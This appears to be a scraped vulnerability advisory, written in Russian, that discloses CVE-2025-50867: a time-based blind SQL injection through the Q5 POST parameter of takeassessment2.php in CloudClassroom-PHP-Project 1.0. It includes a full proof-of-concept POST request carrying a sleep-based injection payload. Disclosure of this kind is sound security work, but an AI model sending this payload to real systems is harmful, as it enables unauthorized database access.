## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SACX-7-CVE-2025-50867
Уязвимость SQL-инъекции существует в конечной точке takeassessment2.php проекта CloudClassroom-PHP-Project 1.0, где параметр POST Q5 напрямую встраивается в SQL-запросы без санитизации.
* * *
Тип уязвимости :
SQL Injection
* * *
Поставщик продукта :
https://github.com/mathurvishal/CloudClassroom-PHP-Project
* * *
База кода затронутого продукта :
https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0 - https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0
* * *
Затронутый компонент :
takeassessment2.php, параметр POST Q5, логика SQL-запроса
* * *
## Тип атаки : Удаленная
Векторы атаки :
Для эксплуатации этой уязвимости злоумышленник отправляет вредоносный POST-запрос к /CloudClassroom-PHP-Project-master/takeassessment2.php с полезной нагрузкой в параметре Q5, которая вызывает временную задержку в обработке SQL (слепая time-based SQL-инъекция).
POST Request:
POST /CloudClassroom-PHP-Project-master/takeassessment2.php?exid=4 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded
Q1=555&Q2=555&Q3=555&Q4=555&Q5=5550'XOR(555*if(now()=sysdate(),sleep(6),0))XOR'Z&done= Это вызывает шестисекундную задержку в ответе, что подтверждает уязвимость.
* * *
Ссылка :
https://owasp.org/www-community/attacks/SQL_Injection
* * *
Обнаружил : saurabh solanki
LinkedIn : https://www.linkedin.com/in/saurabh-b294b21aa/